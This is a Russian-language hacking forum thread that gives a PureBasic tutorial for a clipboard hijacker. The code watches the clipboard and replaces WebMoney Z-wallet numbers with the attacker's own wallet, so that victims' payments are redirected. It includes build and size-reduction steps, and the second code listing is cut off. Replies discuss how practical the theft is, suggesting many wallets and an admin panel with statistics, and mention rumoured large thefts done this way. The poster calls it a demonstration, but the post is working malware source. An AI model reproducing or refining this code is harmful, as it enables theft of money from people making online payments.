|

18.11.2012, 20:44
|
|
Постоянный
С нами:
7202486
|
|
Надеюсь, не нарушу правила форума.
[Intro]
Предлагаю сегодня научиться подменять текст в буфере обмена. Сразу скажу, что я не призываю к кардерству или воровству, цель -- просто показать, насколько просто это может быть.
Писать мы будет на PureBasic. Сейчас, возможно, кто-то сильно разочаровался, не зная, что PureBasic и бейсик, к которому привыкли многие, похожи только синтаксисом. "Под капотом" это абсолютно разные языки. PureBasic -- ничто иное, как простой транслятор бейсика в FAsm, что говорит о многом(асмовые вставки, небольшой размер выходной проги, указатели, отсутствие необходимости в рантаймах и т.д.).
Один минус -- он платный. Но найти полную версию в гугле очень просто, а для наших целей подойдет и демка с офиц. сайта( http://www.purebasic.com/).
[Первый блин]
Итак, приступим. Я, пожалуй, сразу покажу код, а потом его прокоментирую.
Код:
EnableExplicit
Define.s myWMZ="Z123456789012"
Define regex=CreateRegularExpression(#PB_Any, "Z[0-9]+")
While #True
Define curText.s=GetClipboardText()
If MatchRegularExpression(regex, curtext)
SetClipboardText(myWMZ)
EndIf
Delay(100)
Wend
На самом деле язык очень прост и освоить его по прилогаемому мануалу не проблема. Расмотрим только основные аспекты: первая строка -- команда компилятору предупреждать о необьявленный(объявление переменной -- define) переменных. Ее можно убрать, но не исключены опечатки в именах переменных, из-за которых вся логика программы может разрушиться.
Далее идут объявления переменных, замечу только одно: суфикс " .s" указывает компилятору, что это строка, его можно прилепить как к директиве define(первый вариант), так и к имени переменной(второй).
CreateRegularExpression -- функция, создающая регулярку(прошу прощения за плохой паттерн, это просто пример), для последующего использования.
While #True ... Wend -- бесконечный цикл, в котором происходит все самое интересное: получение текста из буфера обмена( Define curText.s=GetClipboardText()), его сравнение с регуляркой( MatchRegularExpression(regex, curtext)) и если он подходит, то его замена нашим текстом( SetClipboardText(myWMZ)).
Вот и все! Теперь давайте соберем нашу программку. Для этого в IDE шелкните по пункту меню Compiler(у меня англ. версия), далее выбираем пункт CreateExecutable(под опциями компилятора). Дальше все просто.
[Разбор полетов]
У меня получился файл размером в 67 кб. Многовато, не так ли? Давайте его уменьшим. Эксперементально выяснилось, что 60 кб тащит модуль работы с регулярками. Поэтому, если урать все упоминания о нем в коде, избвавимся от лишнего веса.
Опять-таки сразу приведу код:
[CODE]
EnableExplicit
Define.s myWMZ="Z123456789012"
;Define regex=CreateRegularExpression(#PB_Any, "Z[0-9]+")
Procedure IsMatch(text.s)
Define i
If Mid(text,1,1)="Z" And Len(text)=13
For i=2 To Len(text)
Define c=Asc(Mid(text, i,1))
If Not(c>=Asc("0") And c
|
|
|

18.11.2012, 21:33
|
|
Познающий
С нами:
9128075
|
|
сабж стар как мир.
таким софтом ты сможешь обворовать лишь школьников, которые не смотрят имя получателя...
да и кошельков тебе придется регать не один десяток под такие дела => нужно будет допилить еще нормальную админку, со статистикой подмены
|
|
|

18.11.2012, 22:31
|
|
Познающий
С нами:
9128075
|
|
Сообщение от Nightmarе
Хорошая мода пошла, выкладываем сплойты, фишки, уязвимости, и всё только для того, чтобы показать свою кристальную честность. Мда...
вайт хацкиры рулят!
|
|
|

18.11.2012, 22:36
|
|
Постоянный
С нами:
7202486
|
|
Сообщение от vaddd
сабж стар как мир.
таким софтом ты сможешь обворовать лишь школьников, которые не смотрят имя получателя...
да и кошельков тебе придется регать не один десяток под такие дела => нужно будет допилить еще нормальную админку, со статистикой подмены
Z-кошель просто пример, в остальном согласен.
П.С. были когда-то слухи, что в LR подобным образом увели немалую сумму.
Сообщение от Nightmarе
Хорошая мода пошла, выкладываем сплойты, фишки, уязвимости, и всё только для того, чтобы показать свою кристальную честность. Мда...
Честность здесь не при чем. Статья писалась в основном для "пробы пера".
|
|
|

18.11.2012, 22:49
|
|
Познающий
С нами:
9128075
|
|
про лр верю, например я, получив кошелек через асю от селлера, копирую, оплачиваю
название кошелька редко смотрю
как и большинство наверное
только заразить меня горазно сложнее чем всяких хомячков-школьников
|
|
|
|
 |
Предыдущая тема
Следующая тема
|